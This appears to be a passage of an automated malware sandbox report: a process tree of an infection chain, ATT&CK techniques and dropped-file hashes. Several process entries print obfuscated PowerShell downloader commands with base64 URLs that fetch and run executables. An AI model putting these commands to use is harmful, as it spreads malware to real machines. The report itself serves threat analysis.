                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:432
                          • C:\Users\Public\qvt.exe
                            "C:\Users\Public\qvt.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2812
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                              6⤵
                              • Loads dropped DLL
                              PID:1880
                              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1868
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                  8⤵
                                  • Loads dropped DLL
                                  PID:1960
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2868
                                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                      10⤵
                                      • Executes dropped EXE
                                      PID:2892
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2976
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2248
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2316
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1892
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2000
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2792
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1600
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2512
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1580
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1648
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1356
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:620
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:868
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2564
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2484
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2420
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1796
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:472
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2372
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2548
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2160
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1224
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:644
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2800
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2532
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:1312
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:832
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2612
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2804
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2664
                            • C:\Users\Public\qvt.exe
                              "C:\Users\Public\qvt.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:564
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\17B5.tmp\b1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1996
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:916
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 2
                        3⤵
                        • Delays execution with timeout.exe
                        PID:2020
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\17B5.tmp\ba.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:600
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1456
                          • C:\Users\Public\lch.exe
                            "C:\Users\Public\lch.exe"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2868
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2932
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:2068
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2068 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\075991678338131\\* & exit
                                  8⤵
                                    PID:1068
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 2068
                                      9⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1744
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:2952
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2280
                              • C:\Users\Public\lch.exe
                                "C:\Users\Public\lch.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2072
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\17B5.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1752
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1476

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    6
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Install Root Certificate

                    1
                    T1130

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\sqlite3.dll
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03926b98-e61c-413f-9b09-8ad8bd1dd0f8
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66352916-727f-465c-9c3e-948fb5e147e1
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85d3bb89-1fa3-489b-95d8-4790c72c6e03
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af42fea1-7905-4f70-80f1-6c739edfee01
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\HIXkedTQxn.exe
                    • C:\Users\Admin\AppData\Local\Temp\HIXkedTQxn.exe
                    • C:\Users\Admin\AppData\Local\Temp\Msbz19BSGM.exe
                    • C:\Users\Admin\AppData\Local\Temp\Msbz19BSGM.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\QEmGu52VXT.exe
                    • C:\Users\Admin\AppData\Local\Temp\QEmGu52VXT.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\r6chkrHkfn.exe
                    • C:\Users\Admin\AppData\Local\Temp\r6chkrHkfn.exe
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
